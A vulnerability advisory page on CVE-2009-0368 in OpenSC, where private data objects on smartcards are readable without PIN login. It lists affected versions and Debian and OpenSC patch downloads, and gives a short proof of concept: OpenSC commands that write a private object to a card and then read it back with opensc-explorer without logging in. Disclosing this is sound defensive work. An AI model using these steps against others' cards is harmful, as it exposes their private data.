OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
BID:33922
Info
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
| Bugtraq ID: | 33922 |
| Class: | Design Error |
| CVE: |
CVE-2009-0368 |
| Remote: | No |
| Local: | Yes |
| Published: | Feb 26 2009 12:00AM |
| Updated: | Apr 13 2015 08:16PM |
| Credit: | Andreas Jellinghaus |
| Vulnerable: |
SuSE SUSE Linux Enterprise 11 SuSE SUSE Linux Enterprise 10 SuSE openSUSE 10.3 S.u.S.E. openSUSE 11.1 S.u.S.E. openSUSE 11.0 Pardus Linux 2008 0 OpenSC OpenSC 0.11.6 OpenSC OpenSC 0.11.5 OpenSC OpenSC 0.11.4 Mandriva Linux Mandrake 2009.0 x86_64 Mandriva Linux Mandrake 2009.0 Mandriva Linux Mandrake 2008.1 x86_64 Mandriva Linux Mandrake 2008.1 Mandriva Linux Mandrake 2008.0 x86_64 Mandriva Linux Mandrake 2008.0 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 Gentoo Linux Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 |
| Not Vulnerable: |
OpenSC OpenSC 0.11.7 |
Discussion
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
OpenSC is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
Versions prior to OpenSC 0.11.7 are vulnerable.
OpenSC is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
Versions prior to OpenSC 0.11.7 are vulnerable.
Exploit / POC
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
Attackers would need physical access to the smartcard reader.
The following proof of concept is available:
create a file with a secret:
echo "This is my secret data" > secret-file
To initialise a blank card:
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
To write a private data object to the card:
pkcs11-tool --label "my secret" --type data --write-object secret-file
--private --login --pin 12345
To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path: 3f0050154701"
To access such an object with low-level tools:
opensc-explorer
cd 5015
get 4701
Attackers would need physical access to the smartcard reader.
The following proof of concept is available:
create a file with a secret:
echo "This is my secret data" > secret-file
To initialise a blank card:
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
To write a private data object to the card:
pkcs11-tool --label "my secret" --type data --write-object secret-file
--private --login --pin 12345
To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path: 3f0050154701"
To access such an object with low-level tools:
opensc-explorer
cd 5015
get 4701
Solution / Fix
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
Solution:
Updates are available. Please see the references for details.
Debian Linux 5.0 ia-64
Debian Linux 5.0 alpha
Debian Linux 5.0 ia-32
Debian Linux 5.0 s/390
Debian Linux 5.0 mipsel
Debian Linux 5.0 arm
Debian Linux 5.0 armel
Debian Linux 5.0 amd64
Debian Linux 5.0 mips
Debian Linux 5.0 powerpc
OpenSC OpenSC 0.11.4
OpenSC OpenSC 0.11.5
OpenSC OpenSC 0.11.6
Solution:
Updates are available. Please see the references for details.
Debian Linux 5.0 ia-64
-
Debian libopensc2-dbg_0.11.4-5+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_ia64.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_ia64.deb -
Debian libopensc2_0.11.4-5+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_ia64.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_ia64.deb -
Debian opensc_0.11.4-5+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_ia64.deb
Debian Linux 5.0 alpha
-
Debian libopensc2-dbg_0.11.4-5+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_alpha.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_alpha.deb -
Debian libopensc2_0.11.4-5+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_alpha.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_alpha.deb -
Debian opensc_0.11.4-5+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_alpha.deb
Debian Linux 5.0 ia-32
-
Debian libopensc2-dbg_0.11.4-5+lenny1_i386.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_i386.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_i386.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_i386.deb -
Debian libopensc2_0.11.4-5+lenny1_i386.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_i386.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_i386.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_i386.deb -
Debian opensc_0.11.4-5+lenny1_i386.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_i386.deb
Debian Linux 5.0 s/390
-
Debian libopensc2-dbg_0.11.4-5+lenny1_s390.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_s390.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_s390.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_s390.deb -
Debian libopensc2_0.11.4-5+lenny1_s390.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_s390.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_s390.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_s390.deb -
Debian opensc_0.11.4-5+lenny1_s390.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_s390.deb
Debian Linux 5.0 mipsel
-
Debian libopensc2-dbg_0.11.4-5+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_mipsel.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_mipsel.deb -
Debian libopensc2_0.11.4-5+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_mipsel.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_mipsel.deb -
Debian opensc_0.11.4-5+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_mipsel.deb
Debian Linux 5.0 arm
-
Debian libopensc2-dbg_0.11.4-5+lenny1_arm.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_arm.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_arm.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_arm.deb -
Debian libopensc2_0.11.4-5+lenny1_arm.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_arm.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_arm.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_arm.deb -
Debian opensc_0.11.4-5+lenny1_arm.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_arm.deb
Debian Linux 5.0 armel
-
Debian libopensc2-dbg_0.11.4-5+lenny1_armel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_armel.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_armel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_armel.deb -
Debian libopensc2_0.11.4-5+lenny1_armel.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_armel.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_armel.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_armel.deb -
Debian opensc_0.11.4-5+lenny1_armel.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_armel.deb
Debian Linux 5.0 amd64
-
Debian libopensc2-dbg_0.11.4-5+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_amd64.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_amd64.deb -
Debian libopensc2_0.11.4-5+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_amd64.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_amd64.deb -
Debian opensc_0.11.4-5+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_amd64.deb
Debian Linux 5.0 mips
-
Debian libopensc2-dbg_0.11.4-5+lenny1_mips.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_mips.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_mips.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_mips.deb -
Debian libopensc2_0.11.4-5+lenny1_mips.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_mips.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_mips.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_mips.deb -
Debian opensc_0.11.4-5+lenny1_mips.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_mips.deb
Debian Linux 5.0 powerpc
-
Debian libopensc2-dbg_0.11.4-5+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0 .11.4-5+lenny1_powerpc.deb -
Debian libopensc2-dev_0.11.4-5+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0 .11.4-5+lenny1_powerpc.deb -
Debian libopensc2_0.11.4-5+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11. 4-5+lenny1_powerpc.deb -
Debian mozilla-opensc_0.11.4-5+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0 .11.4-5+lenny1_powerpc.deb -
Debian opensc_0.11.4-5+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.4-5+ lenny1_powerpc.deb
OpenSC OpenSC 0.11.4
-
OpenSC opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
OpenSC OpenSC 0.11.5
-
OpenSC opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
OpenSC OpenSC 0.11.6
-
OpenSC opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
References
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
References:
References:
- OpenSC Security Advisory [26-Feb-2009] CVE-2009-0368 (OpenSC)
- Vendor Homepage (OpenSC)